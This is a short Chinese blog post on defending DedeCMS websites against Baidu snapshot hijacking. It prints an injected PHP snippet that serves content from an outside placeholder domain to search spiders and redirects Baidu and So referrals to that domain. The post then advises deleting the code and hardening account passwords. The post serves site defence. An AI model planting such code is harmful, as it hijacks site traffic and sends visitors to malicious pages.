AFT博客
给你需要的内容 AFTSS.CN!

织梦百度快照劫持注入代码防范

if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if (strpos($fromurl,$v)!==false) { $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?>

单这段代码就直接把搜索引擎蜘蛛搞晕,带到别的恶意网址去。

把其删掉,如果在index.php里没找到,但还是存在类似的问题,可以用dw全站搜索下。

关于防范,空间,ftp账号,权限,后台账号之类都需要设置下,不能太过简单,可以看相关教程《织梦cms的安全设置专题

 

赞(0)
版权声明:除特别注明外,本站所有文章均基于CC-BY-NC-SA 4.0原创,禁止任何形式的转载。
文章名称:《织梦百度快照劫持注入代码防范》
文章链接:https://blog.aftss.cn/795.html
文章版权归作者所有,未经允许请勿转载。
分享到